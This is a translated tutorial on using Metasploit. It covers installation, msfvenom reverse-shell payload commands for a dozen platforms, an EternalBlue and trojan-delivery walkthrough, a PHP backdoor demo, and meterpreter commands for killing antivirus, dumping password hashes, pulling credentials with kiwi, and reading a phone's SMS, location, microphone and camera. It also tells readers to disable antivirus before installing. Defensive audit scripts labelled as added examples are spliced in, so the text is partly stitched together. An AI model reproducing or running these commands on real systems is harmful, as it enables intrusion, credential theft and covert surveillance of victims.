Detailed explanation of MSF usage

01 History of MSF Development

1 Metasploit-History of Development


The Metasploit framework gives Metasploit good extensibility. Its console is responsible for discovering vulnerabilities, exploiting them and recording them, and post-exploitation tools and reporting tools are added through its interfaces. The framework can import data from a vulnerability scanner, use the details of a vulnerable host to identify exploitable vulnerabilities, and then attack the system with a payload chosen once the vulnerability has been confirmed. Its modules extract local system passwords, install other software or control hardware, much like tools such as BO2K used to do.

year 2004

In August 2004, the Black Hat Briefings hacker conference was held in Las Vegas, and Metasploit took the spotlight. It was developed by four young people including HD Moore and Spoonm. This free software can help hackers attack and control computers, and security staff can also use Metasploit to harden systems against such tools. The Metasploit demonstrations drew many security consultants and people from government agencies such as the DoD and the National Security Agency. As Spoonm said in his talk, Metasploit is simple: "find the target, click and control". The 2004 release of Metasploit caused a strong "earthquake" in the security world.


2005

In June 2005, a "Blue Hat" meeting was held at the Microsoft headquarters in the Seattle area. Hundreds of Microsoft engineers and many outside experts and hackers were invited into the heart of Microsoft's empire. During a hacking demo at the conference, Metasploit rattled Microsoft developers again when Moore explained to system programmers how reliably Metasploit could test systems against intrusion; from the programmers' perspective, Metasploit would put system security to a serious test. First released as open source in 2003, Metasploit (MSF) is a freely available development framework: a powerful open-source platform for developing, testing and using exploit code, and a reliable environment for penetration testing, shellcode writing and vulnerability research. The framework was written in the Perl scripting language until version 2.7, released in 2006. Because of some shortcomings of Perl, the developers rewrote it in Ruby at the end of 2007. By late 2007, Spoonm and Matt Miller had left the project. Starting with version 3.2, released in 2008, the project is licensed under the 3-clause BSD license.

Year 2009

On October 21, 2009, the vulnerability management company Rapid7 acquired the Metasploit project. Rapid7 committed a dedicated development team and still keeps the source code under the 3-clause BSD license.

2 BSD License

Compared with the strictness of the GPL and MPL licenses, the BSD license is much more relaxed. It also only requires attaching the license text, but, more interestingly, it also requires every further developer to add their copyright notice to it. So when you obtain software released under the BSD license you may run into the odd situation that these copyright notices take up more space than the program itself.


3 Metasploit Development Prospects


02 Linux installation of MSF

1 Install MSF on Ubuntu

Environment preparation:

A VM virtual machine

An Ubuntu Desktop image

Open the terminal and enter sudo su to get root privileges

Then enter the command

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Then grant 755 permissions and execute the installation

chmod 755 msfinstall && ./msfinstall

2 Install the Kali system directly

First, a VM virtual machine for Kali

Second, the ISO installation image

First, go to the Kali official website to download Kali

https://www.kali.org/get-kali/#kali-bare-metal and select the installer image

03 Kali update MSF

Log in to Kali

1 Open the terminal and obtain root privileges

To obtain root privileges, enter sudo su in the terminal and then enter your login password.

2 Start the update

First add the update sources.

Enter the /etc/apt/ directory.

Editing sources.list requires root privileges.


deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#Alibaba Cloud Kali update source
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#163 Debian source
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib

deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
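
As an added example (not part of the original page or of Kali's own tooling), the following Python script parses sources.list lines like the ones above and flags two things worth checking before running apt-get update: entries whose suite is not kali-rolling (the wheezy lines above are Debian's, and mixing another distribution's repositories into Kali is a well-known way to break package dependencies), and mirrors fetched over plain http, where the archive signing key is the only integrity protection. The sample input is constructed from the lines above; the function names are this example's own.

```python
# Added example (not part of the original page): parse apt sources.list
# lines and flag entries that do not belong on a Kali Rolling system.
from dataclasses import dataclass, field


@dataclass
class SourceEntry:
    kind: str                      # "deb" or "deb-src"
    url: str
    suite: str                     # e.g. "kali-rolling" or "wheezy/updates"
    components: list = field(default_factory=list)


def parse_sources(text):
    """Return one SourceEntry per non-comment 'deb'/'deb-src' line.
    Comments (#...) and malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("deb", "deb-src"):
            continue
        entries.append(SourceEntry(parts[0], parts[1], parts[2], parts[3:]))
    return entries


def audit_sources(text, expected_suite="kali-rolling"):
    """Return (issue, url, suite) tuples for every risky entry.
    'foreign-suite': the suite is not the expected distribution (mixing
                     Debian wheezy into Kali breaks package dependencies)
    'plain-http':    the mirror is fetched over http, so integrity rests on
                     the archive signing key alone and the transport offers
                     no confidentiality."""
    findings = []
    for e in parse_sources(text):
        if e.suite.split("/")[0] != expected_suite:
            findings.append(("foreign-suite", e.url, e.suite))
        if e.url.startswith("http://"):
            findings.append(("plain-http", e.url, e.suite))
    return findings


# Constructed sample built from the lines shown above: two Kali mirror lines
# and two Debian wheezy lines that were copied in from a Debian tutorial.
SAMPLE_SOURCES = """
# USTC Kali mirror
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# Debian wheezy lines that do not belong here
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
"""

if __name__ == "__main__":
    for issue, url, suite in audit_sources(SAMPLE_SOURCES):
        print(f"{issue:14} {url} {suite}")
```

Run it against the real file with python3 audit.py < /etc/apt/sources.list after replacing SAMPLE_SOURCES with sys.stdin.read(); a clean Kali system produces no foreign-suite findings.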

apt-get update

apt-get install metasploit-framework

3 If an error is displayed when updating


Enter the following commands to fix

wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -

apt-get clean

apt-get update

4 If the following error is reported:
E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).

apt --fix-broken install

04 Windows installation of MSF courseware

1 Download Metasploit

First, go to the Metasploit official website

https://www.metasploit.com/


Click Download to start the download

Or visit this address directly

https://www.metasploit.com/download

On this page, click Download under Metasploit Framework


This takes you to the following address

https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

If you can't open GitHub we can visit https://hub.fastgit.org/rapid7/metasploit-framework/wiki/Nightly-Installers via mirror server


Here are more mirrors that are reachable from mainland China

#Official website mirrors (can be used for clone, push, etc., but not for login)

https://github.com.cnpmjs.org/
https://git.sdut.me/

#Commonly used GitHub mirrors

https://hub.fastgit.org

https://git.sdut.me/

http://github-mirror.bugkiller.org/

#API mirror

https://api.git.sdut.me/

Then find the download for the Windows version

Click latest Windows installer to download the latest version

Click view older builds to download historical versions


2 Install Metasploit and configure environment variables

Turn off Windows' built-in anti-virus and uninstall any third-party anti-virus before installing

Add environment variables

C:\metasploit-framework\bin

3 Start and use

The first start needs to initialize the database

Enter msfdb init in the terminal

Start the MSF framework

Enter msfconsole in the terminal

05 MSF GUI Viper

MSF graphical interface Viper (colorful snake): download and use

Viper is a graphical intranet penetration tool that modularises and weaponises the tactics and techniques commonly used during intranet penetration.

It integrates basic functions such as antivirus bypass, intranet tunnelling, file management and a command line.

At present 70+ modules are integrated, covering the major categories of initial access, persistence, privilege escalation, defense evasion, credential access, information collection and lateral movement.

Install Docker on Kali Linux

apt-get update

# Install docker using apt
apt-get install -y docker.io

# Start the docker service
systemctl start docker

# Check that it is running
docker version

Install docker-compose

curl -L "https://get.daocloud.io/docker/compose/releases/download/1.25.5/docker-compose-$(uname -s)-$(uname -m)" > /usr/bin/docker-compose

# Make it executable
chmod +x /usr/bin/docker-compose

# Set the installation directory
export VIPER_DIR=/root/VIPER

# Execute the following command to create the installation directory and enter it
mkdir -p $VIPER_DIR && cd $VIPER_DIR

Execute the following command to generate docker-compose.yml

If the command shown here is garbled, see this document: https://note.youdao.com/s/GdzSJnWD

tee docker-compose.yml <<-'EOF'
version: "3"
services:
  viper:
    image: registry.cn-shenzhen.aliyuncs.com/toys/viper:latest
    container_name: viper-c
    network_mode: "host"
    restart: always
    volumes:
      - ${PWD}/loot:/root/.msf4/loot
      - ${PWD}/db:/root/viper/Docker/db
      - ${PWD}/module:/root/viper/Docker/module
      - ${PWD}/log:/root/viper/Docker/log
      - ${PWD}/nginxconfig:/root/viper/Docker/nginxconfig
    command: ["VIPER_PASSWORD"]
EOF

Set the login password

Viper does not allow the default password to be used; replace diypassword with your own password.

export VIPER_PASSWORD=diypassword

Write the password into docker-compose.yml

sed -i "s/VIPER_PASSWORD/$VIPER_PASSWORD/g" docker-compose.yml

# View the configuration with
cat docker-compose.yml

Create and start Viper

cd $VIPER_DIR
docker-compose up -d

Start Viper

docker-compose start

Wait about 15 s for the system to start, then visit:

  • https://<ip>:60000
  • Log in with username root and the custom password

Enter ip a in the terminal to view the local IP.

For example: my IP is 192.168.3.31, so I visit https://192.168.3.31:60000 in the browser; the login name is root and the password is the one set above.

Notice:

All docker-compose commands take effect only when executed in the installation directory.

06 MSF directory structure

In the Kali terminal, enter

cd /usr/share/metasploit-framework

Then enter ls to view the contents


Some directories to remember

modules: stores the modules used for penetration: auxiliary modules, encoders, exploits, payloads and post-exploitation modules.

plugins: plugins that must be loaded with load, mainly database connection plugins and various other plugins.

tools: contains some useful scripts and scattered tools.

scripts: the scripts used by meterpreter are stored here.

db: the database data is placed in this directory.

data: files used at run time, such as password dictionaries, meterpreter, passivex, vnc, dlls and other tools, some user interface code, data files used by msfweb and some other modules.

lib: library files are stored in this directory.

07 Metasploit's core modules

The msf modules are placed under this directory:

/usr/share/metasploit-framework/modules/


1 auxiliary: auxiliary modules that support penetration (port scanning, login password brute-forcing, vulnerability verification, etc.)

2 exploits: exploit modules containing the mainstream exploit scripts, usually targeting hosts that may have a vulnerability.

3 payloads: attack payloads, mainly the code executed on the target machine after the attack succeeds, such as the code of a reverse shell

4 post: post-exploitation modules; after the exploit succeeds and a meterpreter is obtained, these are sent to the target to perform functions such as privilege escalation.

5 encoders: the encoder modules, mainly encoding tools that encode or encrypt the payload in order to bypass intrusion detection and filtering systems

6 evasion: evasion modules, used to generate AV-evading payloads

7 nops: mainly tools for adjusting the length of the NOP sled placed in front of the shellcode (it doesn't matter if you don't understand this)

msfvenom in Kali replaces msfpayload and msfencode, and is often used to generate backdoor Trojans

msfpayload is an MSF attack payload generator used to generate shellcode and executable code.
msfencode is the MSF encoder.


08-09 Common parameters of msfvenom (updated)

1. Common parameters of msfvenom

-l
Lists all available resources of the specified module type; module types include payloads, encoders, nops, all

-p
Specifies the payload to use.

-f
Specifies the output format.

Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, python-reflection, vba, vba-exe, vba-psh, vbs, war

Transform formats: base32, base64, bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-e
Specifies the encoder used to encode the payload for AV evasion.

-a
Specifies the target architecture of the payload.

Architectures: x86 | x64 | x86_64
Platforms: windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

-o
Saves the payload to the given output file.

-b
Sets the characters to avoid, for example '\x00\xff'.

-n
Prepends a NOP sled of the given length to the payload.

-s
Sets the maximum size of the resulting payload.

-i
Specifies how many times to encode the payload.

-c
Specifies an additional win32 shellcode file to include.

-x
Specifies a custom executable file to use as a template. For example, given a normal file normal.exe, this option binds the backdoor to that program.

-k
Preserves the behaviour of the template program; the injected payload runs as a new process. For example, given a normal file normal.exe, this option can be used together with -x to bind the backdoor to that program.

-v
Specifies a custom variable name to use for certain output formats.


2. Payload generation commands for each platform


Windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe


Mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.33 LPORT=4444 -f macho -o payload.macho


Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -o payload.apk


Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.1.1 LPORT=8888 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1


Linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f elf -o payload.elf


php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f raw > shell.php


aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8888 -f aspx -o payload.aspx


JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.jsp


war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f war -o payload.war


nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.js


python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.py


perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.pl


ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.rb


lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.1 LPORT=4567 -f raw -o payload.lua


windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


mac shellcode

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4567 -f c


10-11 msfconsole exploit process

1. Stage division:

Exploitation is divided into the stages of pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation and reporting.

1. Pre-engagement interaction stage:

Discussions with the client organization to determine scope, goals, etc.

This stage can be understood as the stage before intelligence gathering; its main purpose is to identify the targets and confirm the scope.

2. Intelligence gathering stage:

Obtain more information about the target organization:

Peripheral information search - Google

Host discovery and port scanning - e.g. Nmap

Service scanning - use the service scanning modules under auxiliary/scanner/ in Metasploit to scan service versions and other information on the target machine

Network vulnerability scanning - OpenVAS, Nessus, etc.

Other tools - scanning with py scripts

3. Threat modeling stage:

Sort out the clues and determine the most feasible exploitation route. The documents written in this stage are not for yourself but for the whole team, to facilitate collaboration.

This stage mainly organises the collected information and clarifies the approach to exploiting the vulnerability.

4. Vulnerability analysis stage:

Search for available exploit code resources.

This stage mainly selects and matches candidate exploit modules and shellcode.

5. Exploitation stage:

Find the security hole and break into the system.

At this stage, try to exploit the vulnerability: configure the listener and launch the exploit.

6. Post-exploitation stage:

Meterpreter; carry out operations.

At this stage, carry out operations such as downloading relevant data, maintaining a backdoor and escalating privileges.

7. Reporting stage:

Exploitation penetration test report (see the penetration test report course for details on writing the report).

This stage mainly summarises the penetration. The overview generally includes time, personnel, scope of the exploitation, technical means and so on. In this part we need to state the time frame of the exploitation, the personnel involved and their contact information, the agreed scope, and descriptions of the techniques and tools used. Write down the pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation and post-exploitation results, security recommendations, etc.

When writing, pay special attention to the following: the vulnerability description should not be too brief or be mentioned only in passing; in the security recommendations section, avoid recommendations with no practical significance, such as "strengthen security awareness"; avoid a chaotic report structure and too much jargon, such as the slang "bypassing the dog", "x station", etc.

2. Actual operation (example)

The host range and target have been identified

1 Intelligence gathering

Discover live hosts on the intranet with msf

Searching

Enter search scanner type:auxiliary in the msf console

Modules that can be used to discover hosts:

auxiliary/scanner/discovery/arp_sweep # Discover live hosts on the intranet based on ARP

auxiliary/scanner/discovery/udp_sweep # Discover live hosts on the intranet based on UDP

auxiliary/scanner/ftp/ftp_version # Discover FTP services

auxiliary/scanner/http/http_version # Discover HTTP services

auxiliary/scanner/smb/smb_version # Discover live hosts on the intranet based on SMB

Discover live hosts on the intranet based on NetBIOS

Discover live hosts on the intranet based on SNMP

Discover live hosts on the intranet based on ICMP

2 Threat modeling

After the first step, intelligence gathering, we discovered the target machine's IP through ARP.

Then, by scanning that IP, we learned that the target machine has port 80 open (a web service), the FTP port open (a file service), and SMB open.

We finally decided to exploit an SMB-related vulnerability.

The alternative is to exploit the machine by planting a Trojan.


3 Vulnerability analysis

The first step is to check for SMB vulnerabilities, such as EternalBlue

1 Query the msf modules related to EternalBlue

Use the command search ms17_010

2 Then we use the EternalBlue scanning module

use auxiliary/scanner/smb/smb_ms17_010

3 Enter options to view the parameters the scanning module needs

3.1 Then we configure rhost (rhost is the target host IP)

set rhost <target ip>

4 Then we run the scan: enter run

Potentially vulnerable hosts are reported

4 Exploitation

1 Load the EternalBlue exploit module

use exploit/windows/smb/ms17_010_eternalblue

2 Enter options to view the parameters the exploit module needs

3.1 Then we configure rhost (rhost is the target host IP)

set rhost <target ip>

3.2 Then we configure lhost (lhost is the listening host, i.e. the attacking machine's IP)

set lhost <attacker ip>

3.3 Then we configure lport (the listening port)

set lport <port>

Note that the port must not already be in use

4 Then we enter run to launch the EternalBlue exploit

But it failed: the module ran but did not return a session

5 Alternative: exploit by planting a Trojan

1 We know the target machine runs Windows, so use msfvenom to generate a Windows Trojan

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe

2 After the payload is generated, serve it with a Python web server so it can be uploaded to the target machine

python -m SimpleHTTPServer 80

3 To configure the listener we use

use exploit/multi/handler

3 Enter options to see the configuration

3.1 Then we configure lhost (lhost is the listening host, i.e. the attacking machine's IP)

set lhost <attacker ip>

3.2 Then we configure lport (the listening port)

set lport <port>

Note that the port must be the same as the port of the Trojan generated by msfvenom

4 Configure the attack payload

set payload windows/meterpreter/reverse_tcp

5 Run exploit and wait for the target machine to execute the Trojan

6 The target machine executes the Trojan

The exploit succeeds and we get a meterpreter


5 Post-exploitation

See the next document

6 Reporting phase

12 Introduction to Meterpreter

1. What is Meterpreter

Meterpreter is a powerful tool in the Metasploit framework. It is used as the attack payload after a vulnerability has been exploited: once the payload has been triggered through the vulnerability, it returns a channel under our control that can be used to execute commands remotely. Metasploit provides Meterpreter versions for all mainstream platforms, including Windows and Linux, on both x86 and x64. In addition, Meterpreter also has implementations in PHP and Java. Meterpreter runs purely in memory. The advantage is that it starts stealthily and is hard for anti-virus software to detect; it does not need to touch the target host's disk, so it leaves no intrusion traces there. Beyond this, Meterpreter supports extensions in the form of Ruby scripts, so some understanding of Ruby is necessary.

2. Commonly used reverse connection types in Meterpreter

1. reverse_tcp
A TCP-based reverse-connection shell; very stable in use

3. Common commands of Meterpreter

1. Basic commands

help # View Meterpreter help
background # Suspend the meterpreter session and return to the msf console
bgkill # Kill a background meterpreter script
bglist # List all running background scripts
bgrun # Run a script as a background thread
channel # Display active channels
sessions -i number # Interact with a session; number is the nth session. Use sessions -i to connect to the meterpreter session with that id and continue working
sessions -k number # Kill the session with that id
close # Close a channel
exit # Terminate the meterpreter session
quit # Terminate the meterpreter session
interact id # Switch into a channel
run # Execute an existing module. Enter run and press tab twice to list all existing scripts; commonly used ones are autoroute, hashdump, arp_scanner, multi_meter_inject, etc.
irb # Enter Ruby scripting mode
read # Read data from a channel
write # Write data to a channel
run and bgrun # Execute a meterpreter script in the foreground or background
use # Load a meterpreter extension
load/use # Load a module
resource # Execute an existing rc script

2 Common commands

2.1 Some commands for Android phones

Get phone contacts: dump_contacts

Get SMS records: dump_sms

Make the test phone send a text message: send_sms -d 15330252525 -t "hello"

Get the GPS location of the test phone: geolocate

Get the Wi-Fi location of the test phone: wlan_geolocate

Record audio on the test phone: record_mic -d 5

List the test phone's camera devices: webcam_list

Take a picture with the test phone's camera: webcam_snap

Stream the test phone's camera: webcam_stream

2.2 Some commands for Windows

View processes: ps

View the current process id: getpid

View system information: sysinfo

Check whether the target machine is a virtual machine: run post/windows/gather/checkvm

View the full routing table: route

View current privileges: getuid

Automatic privilege escalation: getsystem

Close the antivirus software: run post/windows/manage/killav

Enable Remote Desktop: run post/windows/manage/enable_rdp

List currently logged-on users: run post/windows/gather/enum_logged_on_users

List installed applications: run post/windows/gather/enum_applications

Grab a screenshot of the target machine: load espia; screengrab

List camera devices: webcam_list

Take a picture with the camera: webcam_snap

Stream the webcam: webcam_stream

Record the microphone: record_mic

View the current directory on the target machine: pwd

View the current local directory: getlwd

Dump the password hashes of the current users: run hashdump

Output format: Username:SID:LM hash:NTLM hash:::

You can also use the following module (it needs higher privileges): run post/windows/gather/smart_hashdump

Grab the auto-logon username and password: run post/windows/gather/credentials/windows_autologin
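
As an added example (not the page's own code), the following Python parses hashdump-style output in the Username:SID:LM hash:NTLM hash::: format shown above and reports the weak-credential conditions an auditor looks for in such a dump: accounts with a blank password, accounts that still store an LM hash (a legacy format with no place on a modern system), and accounts that share the same NT hash. The two empty-password hash constants are public and well known; the remaining sample hashes are constructed dummy values, not real dumps, and the function names are this example's own.

```python
# Added example (not part of the original page): audit hashdump-style output
# (user:rid:LM:NT:::) for weak-credential conditions. Sample lines are
# constructed; only the empty-password constants are real, public values.
import re
from collections import defaultdict

# Well-known hashes of the empty password (public constants)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text):
    """Return one dict per well-formed line; banners and malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        accounts.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return accounts


def audit_hashdump(text):
    """Return (subject, finding) tuples:
    'blank-password'  - the NT hash is the hash of the empty string
    'lm-hash-stored'  - a real LM hash is present (legacy, trivially crackable)
    'shared-password' - several accounts have the same non-empty NT hash"""
    findings = []
    by_nt = defaultdict(list)
    for a in parse_hashdump(text):
        if a["nt"] == EMPTY_NT:
            findings.append((a["user"], "blank-password"))
        else:
            by_nt[a["nt"]].append(a["user"])
        if a["lm"] != EMPTY_LM:
            findings.append((a["user"], "lm-hash-stored"))
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(sorted(users)), "shared-password"))
    return findings


# Constructed sample: a hashdump banner line followed by three accounts.
# The non-empty hash values below are dummy hex strings, not real hashes.
SAMPLE_DUMP = """
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
"""

if __name__ == "__main__":
    for subject, finding in audit_hashdump(SAMPLE_DUMP):
        print(f"{finding:16} {subject}")
```

The shared-password check deliberately ignores blank accounts, otherwise every disabled account with an empty NT hash would be reported as sharing a password with every other one.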

Obtain plaintext passwords directly (note that this requires SYSTEM privileges; enter getsystem first)

First enter load kiwi in the meterpreter terminal to load kiwi

creds_all: Enumerate all credentials
creds_kerberos: Enumerate all Kerberos credentials
creds_msv: Enumerate all msv credentials
creds_ssp: Enumerate all SSP credentials
creds_tspkg: Enumerate all tspkg credentials
creds_wdigest: Enumerate all WDigest credentials
dcsync: Retrieve user account information via DCSync
dcsync_ntlm: Retrieve user account NTLM hashes, SIDs and RIDs via DCSync
golden_ticket_create: Create golden tickets
kerberos_ticket_list: List Kerberos tickets
kerberos_ticket_purge: Purge Kerberos tickets
kerberos_ticket_use: Use a Kerberos ticket
kiwi_cmd: Execute a mimikatz command, followed by the mimikatz.exe command
lsa_dump_sam: Dump the LSA SAM
lsa_dump_secrets: Dump the LSA secrets
password_change: Change a password
wifi_list: List the current user's Wi-Fi profiles
wifi_list_shared: List the shared Wi-Fi profiles

3. File system commands

cat c:\boot.ini # Show file contents; the file must exist
del c:\boot.ini # Delete the specified file
upload /root/Desktop/netcat.exe c:\ # Upload a file to the target host, e.g. upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/ # Download a file to the local machine, e.g. download C:\boot.ini /root/ or download "C:\Program Files\Tencent\QQ\Users\295****125\Msg2.0.db" /root/
edit c:\boot.ini # Edit a file
getlwd # Print the local directory
getwd # Print the working directory
lcd # Change the local directory
ls # List the files in the current directory
lpwd # Print the local directory
pwd # Print the working directory
cd c:\ # Change to a directory
rm file # Delete a file
mkdir dir # Create a directory on the victim system
rmdir # Delete a directory on the victim system
dir # List file and folder information on the target host
mv # Rename a file on the target host
search -d d:\www -f web.config # Search for a file, e.g. search -d c:\ -f *.doc
meterpreter > search -f autoexec.bat # Search for a file
meterpreter > search -d c:\xamp\ -f sea*.bat
enumdesktops # List all accessible desktops and window stations

13 PHP backdoor reverse connection demonstration document

1. Environment preparation

1 DVWA target range

DVWA download: https://codeload.github.com/ethicalhack3r/DVWA/zip/master

Note: To set up the DVWA environment, prepare PHP 7.0 or above and an Nginx environment.
1 Configure the database password in config/config.inc.php.dist (rename the file to remove the .dist suffix)
2 Visit http://<ip>/setup.php in a browser
3 Resolve the items shown in red
4 Missing key: replace the following 2 lines directly, or visit https://www.google.com/recaptcha/admin/create
$_DVWA[ 'recaptcha_public_key' ] = '6LdJJlUUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb';
$_DVWA[ 'recaptcha_private_key' ] = '6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K';
5 allow_url_include: Disabled prompt (not enabled)
Find allow_url_include in php.ini in the PHP directory and change it from Off to On; restart Nginx for the change to take effect
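
Step 5 above turns on allow_url_include so that DVWA's file inclusion exercises work; on any server that is not a deliberately vulnerable lab this directive must stay Off, because with it enabled an include() of attacker-controlled input fetches and executes remote code. The following Python is an added example (not part of DVWA, PHP or this page) that audits php.ini-style text for that directive and a few related ones, and can rewrite them to Off. The sample ini text is constructed and the function names are this example's own.

```python
# Added example (not part of DVWA or PHP): audit php.ini-style text for the
# directives that the DVWA setup above enables, and rewrite them to Off.

# directive -> (severity, why it matters)
RISKY = {
    "allow_url_include": ("high", "include/require of URLs: remote file inclusion"),
    "allow_url_fopen": ("medium", "file functions can fetch remote URLs"),
    "display_errors": ("low", "leaks paths and stack traces to clients"),
    "expose_php": ("low", "reveals the PHP version in response headers"),
}
TRUE_VALUES = {"on", "1", "true", "yes"}
SEVERITY_ORDER = ("high", "medium", "low")


def parse_ini(text):
    """Return {directive: value} with keys and values lower-cased.
    ';' starts a comment, '[section]' headers are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def audit_php_ini(text):
    """Return (directive, severity, reason) for every risky directive that is
    enabled, most severe first. A directive that is absent counts as Off."""
    settings = parse_ini(text)
    findings = [
        (directive, severity, why)
        for directive, (severity, why) in RISKY.items()
        if settings.get(directive, "off") in TRUE_VALUES
    ]
    return sorted(findings, key=lambda f: SEVERITY_ORDER.index(f[1]))


def harden(text):
    """Return the ini text with every risky directive forced to Off;
    comments, section headers and other directives are left untouched."""
    out = []
    for raw in text.splitlines():
        code = raw.split(";", 1)[0]
        key = code.split("=", 1)[0].strip().lower()
        if key in RISKY and "=" in code:
            out.append(f"{key} = Off")
        else:
            out.append(raw)
    return "\n".join(out)


# Constructed sample: what a DVWA lab php.ini looks like after step 5 above
SAMPLE_PHP_INI = """
[PHP]
; DVWA setup instructions turn this on, which enables remote file inclusion
allow_url_include = On
allow_url_fopen = On
display_errors = Off
expose_php = On
"""

# Constructed sample of a hardened configuration
HARDENED_PHP_INI = """
allow_url_include = Off
allow_url_fopen = Off
display_errors = Off
expose_php = Off
"""

if __name__ == "__main__":
    for directive, severity, why in audit_php_ini(SAMPLE_PHP_INI):
        print(f"{severity:6} {directive}: {why}")
    print(harden(SAMPLE_PHP_INI))
```

Note that the comment handling is line-based: a ';' inside a quoted value would be treated as the start of a comment, which is acceptable for the boolean directives checked here.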

2 Metasploit, any platform

It can be the Windows version or the version that comes with Kali

2. Metasploit: configure the listener and the attack payload

1 Configure the listener using the handler module

use exploit/multi/handler

2 Configure the attack payload: set the payload

The first step is to set the payload

set payload php/meterpreter/reverse_tcp

The second step is to set lhost and lport

set lhost <ip>

set lport <port>

3 Generate the PHP backdoor, execute the attack and obtain a meterpreter

Open a new terminal and enter

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 R>shell.php


3.2 Delivery: a simple web service using Python

python -m SimpleHTTPServer 80

will shell.php

3.3 Execute the attack to get meterpreter


run or exploit

Get the meterpreter and we can do the penetration operation

For example, to view the screen, enter in meterpreter

run vnc

To view the current account, enter in meterpreter

getuid

14 Accessing the file system after exploitation

1. Accessing the file system after exploitation

1. File interaction commands

ID Command Description
1 cat Read file contents
2 cd Change directory on the target
3 cp Copy a file on the target
4 mv Move a file on the target
5 chmod Modify file permissions (e.g. chmod 777 shell.elf)
6 del/rm Delete a file on the target
